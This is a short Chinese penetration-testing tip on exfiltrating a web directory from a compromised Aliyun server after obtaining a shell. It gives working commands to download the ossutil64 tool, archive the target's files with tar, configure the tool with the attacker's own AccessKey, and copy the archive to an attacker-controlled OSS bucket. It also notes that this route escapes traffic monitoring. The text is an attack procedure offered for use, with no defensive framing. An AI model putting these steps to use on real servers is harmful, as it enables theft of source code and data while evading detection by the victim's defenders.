云渗透-拿到shell快速打包下载WEB技巧
拿到云平台的shell,WEB目录打包慢的方法:
服务器带宽有限,下载时间长。
可以使用云OSS进行回传,同时不受流量监控。
连接服务器后发现回传源代码较慢,以aliyun为例:
服务器配置带宽 1Mpbs = 128KB/s 假设我们需要下载10G的压缩包则需要 10G=10*1024*1024 KB= 10485760 KB / 128 = 81920 s = 81920/(60*60) =22.8 小时
在渗透过程当中经不起这么长时间的消耗,加上本台服务器下载几M的文件网速仅达几kb甚至几b 几经周折后,
发现可利用云厂商提供的OSS 进行回传
参考文档
https://help.aliyun.com/document_detail/120075.html?spm=a2c4g.11186623.6.702.4d3d55b7s8bRIX
下载ossutil64 工具
wget http://gosspublic.alicdn.com/ossutil/1.6.10/ossutil64
chmod 755 ossutil64
tar -zcvf /tmp/xxxx.tar /home/xxxx
在阿里云官网中创建“AccessKey”,在下述填写对应信息
./ossutil64 config -e http://oss-cn-xxxx-internal.aliyuncs.com/ -i AccessKey ID -k Access Key Secret
关于-e 后面的网址,其实是OSS的网站。需要自行在阿里云 Bucket 列表中创建一个Bucket,选择相应的区域。#上传时需要研究服务器是经典网络还是vpc。
./ossutil64 --parallel=5 cp -f xxxxx.tar oss://Bucket_name/xxxx.tar #oss协议后面跟刚刚创建的Bucket名称即可。
上述方法5G文件基本1分钟内实现回传完毕。下载速度可达20分钟内完成。